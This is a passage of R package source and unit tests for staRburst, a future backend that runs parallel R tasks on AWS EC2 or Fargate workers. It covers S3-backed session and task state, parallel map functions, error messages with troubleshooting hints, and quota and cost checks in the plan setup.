    task_id <- key_parts[4]

    # Download status
    temp_file <- tempfile(fileext = ".qs")
    tryCatch({
      s3$download_file(
        Bucket = bucket,
        Key = key,
        Filename = temp_file
      )

      statuses[[task_id]] <- qs2::qs_read(temp_file)
    }, error = function(e) {
      # Skip if error reading status
    }, finally = {
      unlink(temp_file)
    })
  }

  statuses
}

#' Atomically claim a pending task
#'
#' This is a helper that combines get + conditional update in one operation
#'
#' @param session_id Session identifier
#' @param task_id Task identifier
#' @param worker_id Worker identifier claiming the task
#' @param region AWS region
#' @param bucket S3 bucket
#' @return TRUE if claimed successfully, FALSE if already claimed
#' @keywords internal
atomic_claim_task <- function(session_id, task_id, worker_id, region, bucket) {
  # Get current status with ETag
  status <- get_task_status(session_id, task_id, region, bucket, include_etag = TRUE)

  # Only claim if pending
  if (status$state != "pending") {
    return(FALSE)
  }

  # Attempt atomic update
  success <- update_task_status(
    session_id = session_id,
    task_id = task_id,
    state = "claimed",
    etag = status$etag,
    region = region,
    bucket = bucket,
    updates = list(
      claimed_at = Sys.time(),
      claimed_by = worker_id
    )
  )

  success
}

test_that("session state functions work correctly", {
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")

  # Setup
  config <- get_starburst_config()
  session_id <- sprintf("test-session-%s", gsub("-", "", uuid::UUIDgenerate()))
  region <- config$region %||% "us-east-1"
  bucket <- config$bucket

  # Create minimal backend
  backend <- list(
    session_id = session_id,
    workers = 2,
    cpu = 1,
    memory = "2GB",
    region = region,
    bucket = bucket,
    timeout = 600,
    absolute_timeout = 3600,
    image_uri = "dummy-image",
    cluster = "test-cluster",
    cluster_name = "test-cluster",
    launch_type = "FARGATE",
    instance_type = NULL,
    use_spot = FALSE,
    architecture = "X86_64",
    warm_pool_timeout = 3600,
    capacity_provider_name = "test-provider",
    asg_name = "test-asg",
    aws_account_id = "123456789012",
    subnets = list("subnet-1"),
    security_groups = list("sg-1"),
    task_definition_arn = "arn:aws:ecs:us-east-1:123456789012:task-definition/test:1"
  )

  # Test create_session_manifest
  expect_silent(create_session_manifest(session_id, backend))

  # Test get_session_manifest
  manifest <- get_session_manifest(session_id, region, bucket)
  expect_equal(manifest$session_id, session_id)
  expect_equal(manifest$backend$workers, 2)
  expect_equal(manifest$stats$total_tasks, 0)

  # Test update_session_manifest
  expect_silent(update_session_manifest(
    session_id = session_id,
    updates = list(stats = list(total_tasks = 5, pending = 3)),
    region = region,
    bucket = bucket
  ))

  manifest <- get_session_manifest(session_id, region, bucket)
  expect_equal(manifest$stats$total_tasks, 5)
  expect_equal(manifest$stats$pending, 3)

  # Test create_task_status
  task_id <- "test-task-1"
  expect_silent(create_task_status(session_id, task_id, "pending", region, bucket))

  # Test get_task_status
  status <- get_task_status(session_id, task_id, region, bucket)
  expect_equal(status$task_id, task_id)
  expect_equal(status$state, "pending")
  expect_null(status$claimed_by)

  # Test atomic_claim_task
  worker_id <- "worker-1"
  claimed <- atomic_claim_task(session_id, task_id, worker_id, region, bucket)
  expect_true(claimed)

  status <- get_task_status(session_id, task_id, region, bucket)
  expect_equal(status$state, "claimed")
  expect_equal(status$claimed_by, worker_id)

  # Test that second claim fails (atomic)
  claimed2 <- atomic_claim_task(session_id, task_id, "worker-2", region, bucket)
  expect_false(claimed2)

  # Test list_pending_tasks
  task_id2 <- "test-task-2"
  create_task_status(session_id, task_id2, "pending", region, bucket)

  pending <- list_pending_tasks(session_id, region, bucket)
  expect_true(task_id2 %in% pending)
  expect_false(task_id %in% pending)  # Already claimed

  # Test list_task_statuses
  statuses <- list_task_statuses(session_id, region, bucket)
  expect_equal(length(statuses), 2)
  expect_true(task_id %in% names(statuses))
  expect_true(task_id2 %in% names(statuses))

  # Cleanup
  s3 <- get_s3_client(region)
  prefix <- sprintf("sessions/%s/", session_id)
  tryCatch({
    objects <- s3$list_objects_v2(Bucket = bucket, Prefix = prefix)
    if (length(objects$Contents) > 0) {
      for (obj in objects$Contents) {
        s3$delete_object(Bucket = bucket, Key = obj$Key)
      }
    }
  }, error = function(e) {
    # Ignore cleanup errors
  })
})

test_that("detached session creation works", {
  skip_if_no_integration()  # launches real Fargate workers
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")

  # This test launches actual workers
  session <- starburst_session(
    workers = 2,
    cpu = 1,
    memory = "2GB",
    launch_type = "FARGATE"
  )

  expect_s3_class(session, "StarburstSession")
  expect_true(!is.null(session$session_id))
  expect_true(!is.null(session$backend))

  # Cleanup
  session$cleanup()
})

test_that("session submit and collect workflow", {
  skip_if_no_integration()  # launches real Fargate workers
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")

  # Create session (FARGATE - no EC2 ASG required)
  session <- starburst_session(workers = 2, cpu = 1, memory = "2GB", launch_type = "FARGATE")

  # Submit tasks
  task_ids <- lapply(1:5, function(i) {
    session$submit(quote(i * 2))
  })

  expect_equal(length(task_ids), 5)

  # Check status
  status <- session$status()
  expect_s3_class(status, "StarburstSessionStatus")
  expect_equal(status$total, 5)

  # Wait and collect (Fargate cold start takes ~2-3 min)
  results <- session$collect(wait = TRUE, timeout = 300)

  expect_true(length(results) > 0)

  # Cleanup
  session$cleanup()
})

test_that("session attach workflow", {
  skip_if_no_integration()  # launches real Fargate workers
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")

  # Create session (FARGATE - no EC2 ASG required)
  session <- starburst_session(workers = 2, cpu = 1, memory = "2GB", launch_type = "FARGATE")
  session_id <- session$session_id

  # Submit tasks
  lapply(1:10, function(i) session$submit(quote({Sys.sleep(5); i})))

  # Detach (simulate closing R)
  rm(session)

  # Reattach
  session <- starburst_session_attach(session_id)

  expect_s3_class(session, "StarburstSession")
  expect_equal(session$session_id, session_id)

  # Check status
  status <- session$status()
  expect_equal(status$total, 10)

  # Collect results (Fargate cold start takes ~2-3 min)
  results <- session$collect(wait = TRUE, timeout = 300)
  expect_equal(length(results), 10)

  # Cleanup
  session$cleanup()
})

test_that("list sessions works", {
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")

  sessions <- starburst_list_sessions()

  expect_true(is.data.frame(sessions))
  expect_true("session_id" %in% colnames(sessions))
})

test_that("worker detached mode detection works", {
  # This tests the logic without actually running a worker

  # Mock task with session_id (detached mode)
  detached_task <- list(
    session_id = "session-123",
    task_id = "task-456",
    expr = quote(2 + 2),
    globals = list(),
    packages = NULL
  )

  expect_true(!is.null(detached_task$session_id))

  # Mock task without session_id (ephemeral mode)
  ephemeral_task <- list(
    task_id = "task-789",
    expr = quote(3 + 3),
    globals = list(),
    packages = NULL
  )

  expect_true(is.null(ephemeral_task$session_id))
})

test_that("plan guard prevents detached mode misuse", {
  expect_error(
    plan.starburst(
      strategy = starburst,
      workers = 10,
      detached = TRUE
    ),
    "Detached mode cannot be used with plan"
  )
})

test_that("collect(wait=TRUE) returns when user tasks finish despite live bootstrap tasks", {
  # Regression for #38: the all_completed check must ignore bootstrap-* tasks,
  # which stay "claimed"/"running" for the session's life. Otherwise wait=TRUE
  # hangs until timeout even though every real result has landed in S3.
  skip_if_not_installed("mockery")

  statuses <- list(
    "bootstrap-session-x-1" = list(state = "claimed"),
    "bootstrap-session-x-2" = list(state = "running"),
    "task-aaa" = list(state = "completed"),
    "task-bbb" = list(state = "completed")
  )

  mockery::stub(collect_session_results, "list_task_statuses", function(...) statuses)
  mockery::stub(collect_session_results, "get_s3_client", function(...) {
    list(download_file = function(Bucket, Key, Filename) {
      qs2::qs_save(list(error = FALSE, value = 42), Filename)
    })
  })

  session <- list(backend = list(session_id = "session-x", region = "us-east-1",
                                 bucket = "b"))

  # Must return quickly (well under the timeout) with both user results, not hang.
  start <- Sys.time()
  res <- collect_session_results(session, wait = TRUE, timeout = 30)
  elapsed <- as.numeric(difftime(Sys.time(), start, units = "secs"))

  expect_named(res, c("task-aaa", "task-bbb"), ignore.order = TRUE)
  expect_lt(elapsed, 10)  # returned promptly, did not spin to timeout
})

test_that("collect() returns a structured failure entry for failed tasks", {
  # Regression for the 4th-review finding: collect() must NOT silently drop
  # failed tasks. Every terminal task appears; failures carry error=TRUE.
  skip_if_not_installed("mockery")

  statuses <- list(
    "bootstrap-session-x-1" = list(state = "claimed"),
    "task-ok"   = list(state = "completed"),
    "task-fail" = list(state = "failed", error = "boom")
  )
  mockery::stub(collect_session_results, "list_task_statuses", function(...) statuses)
  # S3 has the success blob but NOT the failed one -> exercises the synthesize path.
  mockery::stub(collect_session_results, "get_s3_client", function(...) {
    list(download_file = function(Bucket, Key, Filename) {
      if (grepl("task-ok", Key)) {
        qs2::qs_save(list(error = FALSE, value = 21), Filename)
      } else {
        stop("NoSuchKey")   # failed task's blob missing
      }
    })
  })

  session <- list(backend = list(session_id = "session-x", region = "us-east-1",
                                 bucket = "b"))
  res <- collect_session_results(session, wait = TRUE, timeout = 30)

  expect_setequal(names(res), c("task-ok", "task-fail"))
  expect_false(isTRUE(res[["task-ok"]]$error))
  expect_equal(res[["task-ok"]]$value, 21)
  # failed task present as a structured failure, synthesized from status$error
  expect_true(isTRUE(res[["task-fail"]]$error))
  expect_match(res[["task-fail"]]$message, "boom")
})

#' Map a Function Over Data on AWS Workers
#'
#' Parallel map function that executes across AWS workers (EC2 by default, or
#' Fargate) using the staRburst Future backend.
#'
#' @param .x A vector or list to iterate over
#' @param .f A function to apply to each element
#' @param workers Number of parallel workers (default: 10)
#' @param cpu CPU units per worker (1, 2, 4, 8, or 16)
#' @param memory Memory per worker (e.g., 8GB)
#' @param region AWS region
#' @param timeout Maximum runtime in seconds per task
#' @param launch_type Compute backend: "EC2" (default) or "FARGATE"
#' @param instance_type EC2 instance type when \code{launch_type = "EC2"}
#'   (default: "c7g.xlarge"). The worker CPU architecture follows the instance
#'   type — Graviton types (e.g. \code{c7g.*}) run ARM64, Intel/AMD types
#'   (e.g. \code{c7i.*}) run x86_64 — so there is no separate platform argument.
#' @param use_spot Use EC2 Spot instances for cost savings (default: TRUE)
#' @param .progress Show progress bar (default: TRUE)
#' @param ... Additional arguments passed to .f
#'
#' @return A list of results, one per element of .x
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   # Simple parallel computation
#'   results <- starburst_map(1:100, function(x) x^2, workers = 10)
#'
#'   # With custom configuration
#'   results <- starburst_map(
#'     data_list,
#'     expensive_function,
#'     workers = 50,
#'     cpu = 4,
#'     memory = "8GB"
#'   )
#'
#'   # Use the Fargate backend instead of the EC2 default
#'   results <- starburst_map(1:100, function(x) x^2,
#'                            workers = 10, launch_type = "FARGATE")
#' }
#' }
starburst_map <- function(.x, .f, workers = 10, cpu = 4, memory = "8GB",
                          region = NULL, timeout = 3600,
                          launch_type = "EC2", instance_type = "c7g.xlarge",
                          use_spot = TRUE, .progress = TRUE, ...) {

  # Validate inputs
  validate_workers(workers)
  validate_cpu(cpu)
  validate_memory(memory)

  # Get configuration
  config <- get_starburst_config()
  region <- region %||% config$region %||% "us-east-1"

  # Setup progress reporting
  if (.progress) {
    cat_info(sprintf("[Starting] Starting starburst cluster with %d workers\n", workers))
  }

  start_time <- Sys.time()

  # Set up the Future plan by calling plan.starburst directly
  # (bypasses Future package dispatch issues)
  old_plan <- future::plan()
  on.exit({
    future::plan(old_plan)
  }, add = TRUE)

  strategy <- plan.starburst(
    strategy = starburst,
    workers = workers,
    cpu = cpu,
    memory = memory,
    region = region,
    timeout = timeout,
    launch_type = launch_type,
    instance_type = instance_type,
    use_spot = use_spot
  )

  future::plan(strategy)

  # Execute by creating StarburstFuture objects directly
  # Pass extra arguments via wrapper function
  if (length(list(...)) > 0) {
    extra_args <- list(...)
    .f_wrapped <- function(x) {
      do.call(.f, c(list(x), extra_args))
    }
  } else {
    .f_wrapped <- .f
  }

  # Create futures for each item
  n <- length(.x)
  futures <- vector("list", n)

  for (i in seq_along(.x)) {
    item <- .x[[i]]

    # Create globals list with the function and item
    globals_list <- list(
      .f_wrapped = .f_wrapped,
      .item = item
    )

    futures[[i]] <- StarburstFuture(
      expr = quote(.f_wrapped(.item)),
      envir = parent.frame(),
      substitute = FALSE,
      globals = globals_list,  # Pass as globals so they get serialized
      packages = NULL
    )
  }

  # Run all futures
  if (.progress) {
    cat_info(sprintf("[Starting] Submitting %d tasks...\n", n))
  }

  for (future in futures) {
    run(future)
  }

  # Wait for results
  if (.progress) {
    cat_info("[Wait] Waiting for results...\n")
  }

  results <- vector("list", n)
  completed <- 0
  last_update <- Sys.time()

  while (completed < n) {
    for (i in seq_along(futures)) {
      if (!is.null(results[[i]])) next

      if (resolved(futures[[i]])) {
        result_obj <- result(futures[[i]])

        if (length(result_obj$conditions) > 0) {
          stop(sprintf("Task %d failed: %s", i, result_obj$conditions[[1]]$message))
        }

        results[[i]] <- result_obj$value
        completed <- completed + 1

        if (.progress && (completed == n || difftime(Sys.time(), last_update, units = "secs") >= 2)) {
          elapsed <- as.numeric(difftime(Sys.time(), start_time, units = "secs"))
          cat_info(sprintf("\r[Wait] Progress: %d/%d (%.1fs)   ", completed, n, elapsed))
          last_update <- Sys.time()
        }
      }
    }

    if (completed < n) {
      Sys.sleep(1)
    }
  }

  if (.progress) {
    elapsed <- as.numeric(difftime(Sys.time(), start_time, units = "secs"))
    cat_success(sprintf("\n[OK] Completed in %.1f seconds\n", elapsed))

    # Cost estimate — forward the actual backend/instance/spot so the estimate
    # matches where the job ran (previously always used Fargate defaults).
    cost_est <- estimate_cost(workers, cpu, memory,
                              launch_type = launch_type,
                              instance_type = instance_type,
                              use_spot = use_spot)
    hours <- elapsed / 3600
    est_cost <- cost_est$hourly_rate * hours
    cat_info(sprintf("[Cost] Estimated cost: $%.2f\n", est_cost))
  }

  results
}

#' Create a Starburst Cluster
#'
#' Creates a cluster object for managing AWS workers (EC2 by default, or Fargate)
#' using the staRburst Future backend.
#'
#' @param workers Number of parallel workers
#' @param cpu CPU units per worker
#' @param memory Memory per worker
#' @param region AWS region
#' @param timeout Maximum runtime in seconds
#' @param launch_type Compute backend: "EC2" (default) or "FARGATE"
#' @param instance_type EC2 instance type when \code{launch_type = "EC2"}
#'   (default: "c7g.xlarge"). Worker CPU architecture follows the instance type
#'   (Graviton \code{*g.*} = ARM64, Intel/AMD = x86_64); there is no separate
#'   platform argument.
#' @param use_spot Use EC2 Spot instances for cost savings (default: TRUE)
#'
#' @return A starburst_cluster object
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   cluster <- starburst_cluster(workers = 20)
#'   results <- cluster$map(data, function(x) x * 2)
#'
#'   # Fargate backend instead of the EC2 default
#'   fg <- starburst_cluster(workers = 20, launch_type = "FARGATE")
#' }
#' }
starburst_cluster <- function(workers = 10, cpu = 4, memory = "8GB",
                              region = NULL, timeout = 3600,
                              launch_type = "EC2", instance_type = "c7g.xlarge",
                              use_spot = TRUE) {

  # Get configuration
  config <- get_starburst_config()
  region <- region %||% config$region %||% "us-east-1"

  # Setup the Future plan by calling plan.starburst directly
  strategy <- plan.starburst(
    strategy = starburst,
    workers = workers,
    cpu = cpu,
    memory = memory,
    region = region,
    timeout = timeout,
    launch_type = launch_type,
    instance_type = instance_type,
    use_spot = use_spot
  )

  future::plan(strategy)

  # Get backend from options (set by plan.starburst)
  backend <- getOption("starburst.current_backend")

  # Create cluster object
  cluster <- list(
    evaluator = backend,
    backend = backend,
    cluster_id = backend$cluster_id,
    workers = backend$workers,
    cpu = backend$cpu,
    memory = backend$memory,
    region = backend$region,
    launch_type = launch_type,
    instance_type = instance_type,
    use_spot = use_spot,
    created_at = backend$created_at
  )

  # Add methods
  cluster$map <- function(.x, .f, .progress = TRUE) {
    starburst_cluster_map(cluster, .x, .f, .progress)
  }

  cluster$estimate_cost <- function(elapsed_seconds) {
    cost_est <- estimate_cost(cluster$workers, cluster$cpu, cluster$memory,
                              launch_type = cluster$launch_type,
                              instance_type = cluster$instance_type,
                              use_spot = cluster$use_spot)
    hours <- elapsed_seconds / 3600
    cost_est$hourly_rate * hours
  }

  cluster$shutdown <- function() {
    cleanup_cluster(cluster$backend)
    future::plan(future::sequential)
  }

  class(cluster) <- "starburst_cluster"

  cluster
}

#' Execute Map on Starburst Cluster
#'
#' Internal function to execute parallel map by creating StarburstFuture objects directly
#'
#' @keywords internal
starburst_cluster_map <- function(cluster, .x, .f, .progress = TRUE) {

  n <- length(.x)

  if (.progress) {
    cat_info(sprintf("[Status] Processing %d items with %d workers\n", n, cluster$workers))
  }

  start_time <- Sys.time()

  # Create StarburstFuture objects directly for each item
  # This bypasses the Future dispatch issues
  futures <- vector("list", n)

  for (i in seq_along(.x)) {
    # Create a future for this item
    item <- .x[[i]]

    # Create globals list
    globals_list <- list(
      .f = .f,
      .item = item
    )

    futures[[i]] <- StarburstFuture(
      expr = quote(.f(.item)),
      envir = parent.frame(),
      substitute = FALSE,
      globals = globals_list,  # Pass as globals so they get serialized
      packages = NULL
    )
  }

  # Run all futures (submits to AWS)
  if (.progress) {
    cat_info(sprintf("[Starting] Submitting %d tasks to AWS...\n", n))
  }

  for (future in futures) {
    run(future)
  }

  # Wait for all futures to resolve and collect results
  if (.progress) {
    cat_info("[Wait] Waiting for results...\n")
  }

  results <- vector("list", n)
  completed <- 0
  last_update <- Sys.time()

  while (completed < n) {
    for (i in seq_along(futures)) {
      if (!is.null(results[[i]])) next  # Already got result

      if (resolved(futures[[i]])) {
        result_obj <- result(futures[[i]])

        # Check for errors
        if (length(result_obj$conditions) > 0) {
          stop(sprintf("Task %d failed: %s", i, result_obj$conditions[[1]]$message))
        }

        results[[i]] <- result_obj$value
        completed <- completed + 1

        if (.progress && (completed == n || difftime(Sys.time(), last_update, units = "secs") >= 2)) {
          elapsed <- as.numeric(difftime(Sys.time(), start_time, units = "secs"))
          cat_info(sprintf("\r[Wait] Progress: %d/%d tasks (%.1fs elapsed)   ", completed, n, elapsed))
          last_update <- Sys.time()
        }
      }
    }

    if (completed < n) {
      Sys.sleep(1)
    }
  }

  if (.progress) {
    elapsed <- as.numeric(difftime(Sys.time(), start_time, units = "secs"))
    cat_success(sprintf("\n[OK] Completed %d items in %.1f seconds\n", n, elapsed))
  }

  results
}

# Note: %||% operator defined in R/utils.R

#' Error Handling for staRburst
#'
#' Improved error messages with context and solutions
#'
#' @name errors
#' @keywords internal
NULL

#' Create informative staRburst error
#'
#' Creates error messages with context, solutions, and links to documentation
#'
#' @param message Main error message
#' @param context Named list of contextual information
#' @param solution Suggested solution (optional)
#' @param call Calling function (default: sys.call(-1))
#'
#' @return Error condition with class "starburst_error"
#' @keywords internal
starburst_error <- function(message,
                           context = list(),
                           solution = NULL,
                           call = sys.call(-1)) {

  # Build full message
  full_message <- message

  # Add context if provided
  if (length(context) > 0) {
    context_lines <- vapply(names(context), function(k) {
      value <- context[[k]]
      if (is.numeric(value)) {
        sprintf("  %s: %s", k, format(value, big.mark = ","))
      } else {
        sprintf("  %s: %s", k, as.character(value))
      }
    }, FUN.VALUE = character(1))
    full_message <- sprintf("%s\n\nContext:\n%s",
                           full_message,
                           paste(context_lines, collapse = "\n"))
  }

  # Add solution if provided
  if (!is.null(solution)) {
    full_message <- sprintf("%s\n\n[TIP] Solution:\n  %s",
                           full_message,
                           solution)
  }

  # Add link to troubleshooting guide
  full_message <- sprintf(
    "%s\n\n[INFO] For more help: vignette('troubleshooting', package = 'starburst')",
    full_message
  )

  # Create error condition
  structure(
    list(
      message = full_message,
      call = call,
      context = context,
      solution = solution
    ),
    class = c("starburst_error", "error", "condition")
  )
}

#' Quota exceeded error
#'
#' @keywords internal
quota_error <- function(resource,
                       requested,
                       available,
                       region,
                       workers = NULL,
                       cpu = NULL) {

  # Calculate what's possible
  if (!is.null(workers) && !is.null(cpu)) {
    vcpus_per_worker <- cpu
    max_possible_workers <- floor(available / vcpus_per_worker)

    solution <- sprintf(
      paste0(
        "Option 1: Request quota increase\n",
        "  * Go to AWS Console --> Service Quotas --> AWS Fargate\n",
        "  * Request increase to %d %s\n\n",
        "Option 2: Reduce workers to %d\n",
        "  plan(starburst, workers = %d)\n\n",
        "Option 3: Reduce CPU per worker\n",
        "  plan(starburst, workers = %d, cpu = 1, memory = \"2GB\")"
      ),
      ceiling(requested / 100) * 100, resource,
      max_possible_workers, max_possible_workers,
      workers
    )
  } else {
    solution <- sprintf(
      "Request quota increase in AWS Console --> Service Quotas --> AWS Fargate"
    )
  }

  starburst_error(
    sprintf("Insufficient %s quota", resource),
    context = list(
      resource = resource,
      requested = requested,
      available = available,
      region = region
    ),
    solution = solution
  )
}

#' Permission denied error
#'
#' @keywords internal
permission_error <- function(service,
                            operation,
                            resource = NULL,
                            iam_role = NULL) {

  context <- list(
    service = service,
    operation = operation
  )

  if (!is.null(resource)) {
    context$resource <- resource
  }

  if (!is.null(iam_role)) {
    context$iam_role <- iam_role
  }

  solution <- sprintf(
    paste0(
      "Option 1: Add IAM permissions\n",
      "  * Go to IAM --> Roles --> %s\n",
      "  * Add permission: %s:%s\n\n",
      "Option 2: Run starburst_setup() to create required roles\n",
      "  starburst_setup()\n\n",
      "Option 3: Check AWS credentials\n",
      "  library(paws.security.identity)\n",
      "  sts <- paws.security.identity::sts()\n",
      "  print(sts$get_caller_identity())"
    ),
    iam_role %||% "your-task-role",
    service,
    operation
  )

  starburst_error(
    sprintf("Permission denied: %s:%s", service, operation),
    context = context,
    solution = solution
  )
}

#' Task failure error
#'
#' @keywords internal
task_failure_error <- function(task_id,
                              reason = NULL,
                              exit_code = NULL,
                              log_stream = NULL) {

  context <- list(task_id = task_id)

  if (!is.null(reason)) {
    context$failure_reason <- reason
  }

  if (!is.null(exit_code)) {
    context$exit_code <- exit_code
  }

  solution <- "Check CloudWatch Logs for detailed error messages:\n"

  if (!is.null(log_stream)) {
    solution <- sprintf(
      paste0(
        "%s",
        "  1. Go to CloudWatch --> Log Groups --> /aws/ecs/starburst-worker\n",
        "  2. Find log stream: %s\n",
        "  3. Review error messages\n\n",
        "Or use AWS CLI:\n",
        "  aws logs tail /aws/ecs/starburst-worker --log-stream-names %s --follow"
      ),
      solution,
      log_stream,
      log_stream
    )
  } else {
    solution <- sprintf(
      paste0(
        "%s",
        "  1. Go to CloudWatch --> Log Groups --> /aws/ecs/starburst-worker\n",
        "  2. Search for task ID: %s\n",
        "  3. Review error messages"
      ),
      solution,
      task_id
    )
  }

  starburst_error(
    sprintf("Task failed: %s", task_id),
    context = context,
    solution = solution
  )
}

#' Worker validation error
#'
#' @keywords internal
worker_validation_error <- function(workers,
                                   max_allowed = 500) {

  starburst_error(
    "Invalid worker count",
    context = list(
      workers_requested = workers,
      max_allowed = max_allowed
    ),
    solution = sprintf(
      paste0(
        "Reduce workers to %d or less:\n",
        "  plan(starburst, workers = %d)\n\n",
        "For higher limits, contact AWS support:\n",
        "  https://docs.aws.amazon.com/servicequotas/"
      ),
      max_allowed,
      max_allowed
    )
  )
}

#' Package installation error
#'
#' @keywords internal
package_installation_error <- function(package,
                                      error_message = NULL) {

  context <- list(package = package)

  if (!is.null(error_message)) {
    context$error <- substring(error_message, 1, 200)  # Truncate long errors
  }

  solution <- sprintf(
    paste0(
      "Option 1: Install package locally first\n",
      "  install.packages('%s')\n",
      "  renv::snapshot()  # Update renv.lock\n\n",
      "Option 2: Check for system dependencies\n",
      "  # Package may need system libraries\n",
      "  # Add to Dockerfile.base if needed\n\n",
      "Option 3: Use development version\n",
      "  renv::install('user/repo')\n",
      "  renv::snapshot()"
    ),
    package
  )

  starburst_error(
    sprintf("Failed to install package: %s", package),
    context = context,
    solution = solution
  )
}

# Package environment for storing the current backend
.starburst_state <- new.env(parent = emptyenv())

#' staRburst Future Backend
#'
#' A future backend for running parallel R workloads on AWS (EC2 or Fargate)
#'
#' @param strategy The starburst strategy marker (ignored, for S3 dispatch)
#' @param workers Number of parallel workers
#' @param cpu vCPUs per worker (1, 2, 4, 8, or 16)
#' @param memory Memory per worker (supports GB notation, e.g., "8GB")
#' @param region AWS region (default: from config or "us-east-1")
#' @param timeout Maximum runtime in seconds (default: 3600)
#' @param auto_quota_request Automatically request quota increases (default: interactive())
#' @param launch_type Launch type: EC2 or FARGATE (default: EC2)
#' @param instance_type EC2 instance type when using EC2 launch type (default: c7g.xlarge)
#' @param use_spot Use EC2 Spot instances for cost savings (default: TRUE)
#' @param warm_pool_timeout Timeout for warm pool in seconds (default: 3600)
#' @param detached Use detached session mode (deprecated, use starburst_session instead)
#' @param ... Additional arguments passed to future backend
#'
#' @return A future plan object
#' @importFrom future plan
#' @method plan starburst
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   future::plan(starburst, workers = 50)
#'   results <- future.apply::future_lapply(1:100, function(i) i^2)
#' }
#' }
plan.starburst <- function(strategy,
                           workers = 10,
                           cpu = 4,
                           memory = "8GB",
                           region = NULL,
                           timeout = 3600,
                           auto_quota_request = interactive(),
                           launch_type = "EC2",
                           instance_type = "c7g.xlarge",
                           use_spot = TRUE,
                           warm_pool_timeout = 3600,
                           detached = FALSE,
                           ...) {

  cat(sprintf("  workers=%s, launch_type=%s, instance_type=%s\n",
              workers, launch_type, instance_type))

  # Guard against misuse of detached mode
  if (detached) {
    stop("Detached mode cannot be used with plan(). Use starburst_session() instead.\n\n",
         "Example:\n",
         "  session <- starburst_session(workers = 10)\n",
         "  session$submit(quote(my_computation()))\n",
         "  results <- session$collect()\n\n",
         "See ?starburst_session for details.")
  }

  # Validate inputs
  validate_workers(workers)
  validate_cpu(cpu)
  validate_memory(memory)
  validate_launch_type(launch_type)

  # Get configuration
  config <- get_starburst_config()
  region <- region %||% config$region %||% "us-east-1"

  # Check AWS credentials
  check_aws_credentials()

  # Validate instance type for EC2
  if (launch_type == "EC2") {
    validate_instance_type(instance_type)
  }

  # Get architecture from instance type
  architecture <- if (launch_type == "EC2") {
    get_architecture_from_instance_type(instance_type)
  } else {
    "X86_64"  # Fargate default
  }

  # Check quota (only for Fargate)
  quota_limited <- FALSE
  workers_per_wave <- workers
  num_waves <- 1

  if (launch_type == "FARGATE") {
    quota_info <- check_fargate_quota(region)
    vcpus_needed <- workers * cpu
    vcpus_available <- quota_info$limit

    if (vcpus_needed > vcpus_available) {
    # Calculate wave-based execution
    workers_per_wave <- floor(vcpus_available / cpu)
    num_waves <- ceiling(workers / workers_per_wave)
    quota_limited <- TRUE

    # Inform user
    cat_warn(sprintf(
      "[WARNING] Requested: %d workers (%d vCPUs)\n[WARNING] Current quota: %d vCPUs (allows %d workers max)\n",
      workers, vcpus_needed, vcpus_available, workers_per_wave
    ))

    cat_info(sprintf(
      "\n[Plan] Execution plan:\n   * Running in %d waves of %d workers each\n",
      num_waves, workers_per_wave
    ))

    # Offer quota increase
    if (!quota_info$increase_pending && auto_quota_request) {
      recommended_quota <- suggest_quota(vcpus_needed)

      cat_info(sprintf(
        "\n[TIP] Quota increase recommended:\n   Request %d vCPU quota? (usually approved in 1-24 hours)\n",
        recommended_quota
      ))

      response <- readline("   [y/n]: ")
      if (tolower(response) == "y") {
        case_id <- request_quota_increase(
          service = "fargate",
          quota_code = "L-3032A538",
          desired_value = recommended_quota,
          region = region,
          reason = sprintf("staRburst parallel R computing with %d workers", workers)
        )

        if (!is.null(case_id)) {
          cat_success(sprintf("[OK] Quota increase requested (Case ID: %s)\n", case_id))
          cat_success("[OK] You'll receive email when approved\n")
          cat_success("[OK] Future runs will use full parallelism\n")
        }
      }
    }
    }
  }

  # Estimate cost
  cost_est <- estimate_cost(workers, cpu, memory,
                           launch_type = launch_type,
                           instance_type = instance_type,
                           use_spot = use_spot)

  if (launch_type == "FARGATE") {
    cat_info(sprintf("\n[Cost] Estimated cost: ~$%.2f/hour\n", cost_est$hourly_rate))
  } else {
    cat_info(sprintf("\n[Cost] Estimated cost: ~$%.2f/hour (%d x %s%s)\n",
                    cost_est$hourly_rate,
                    cost_est$instances_needed,
                    instance_type,
                    if (use_spot) " spot" else ""))
  }

  # Cost alert (warn, does not stop) — the normalized hourly_rate works for every
  # backend, so this fires on EC2 (the default) too.
  if (!is.null(config$cost_alert_threshold) &&
      cost_est$hourly_rate > config$cost_alert_threshold) {
    cat_warn(sprintf(
      "[Cost] Estimated $%.2f/hr is above your alert threshold ($%.2f/hr).\n",
      cost_est$hourly_rate, config$cost_alert_threshold))
  }

  # Cost limit (hard stop). max_hourly_cost is an hourly-RATE cap, USD/hour.
  if (!is.null(config$max_hourly_cost) && cost_est$hourly_rate > config$max_hourly_cost) {
    stop(sprintf(
      "Estimated cost ($%.2f/hr) exceeds limit ($%.2f/hr). Adjust with starburst_config(max_hourly_cost = ...)",
      cost_est$hourly_rate, config$max_hourly_cost
    ))
  }

  # Ensure environment is ready
  env_info <- ensure_environment(region)

  # Create cluster identifier
  cluster_id <- sprintf("starburst-%s", uuid::UUIDgenerate())

  # Get config for bucket
  config <- get_starburst_config()

  # Create backend object (mutable environment)
  backend <- list(
    cluster_id = cluster_id,
    cluster = env_info$cluster,
    workers = workers,
    workers_per_wave = workers_per_wave,
    num_waves = num_waves,
    quota_limited = quota_limited,
    cpu = cpu,
    memory = memory,
    region = region,
    bucket = config$bucket,
    timeout = timeout,
    env_hash = env_info$hash,
    image_uri = env_info$image_uri,
    created_at = Sys.time(),
    total_tasks = 0,
    completed_tasks = 0,
    failed_tasks = 0,
    total_cost = 0,
    wave_queue = list(
      pending = list(),         # Futures waiting to be submitted
      current_wave = 1,         # Current wave number
      wave_futures = list(),    # Currently running futures
      completed = 0             # Number of completed tasks
    ),
    worker_cpu = cpu,
    worker_memory = as.numeric(gsub("[^0-9.]", "", memory)),
    task_definition_arn = NULL,  # Will be set during first task submission
    # EC2-specific fields
    launch_type = launch_type,
    instance_type = instance_type,
    use_spot = use_spot,
    architecture = architecture,
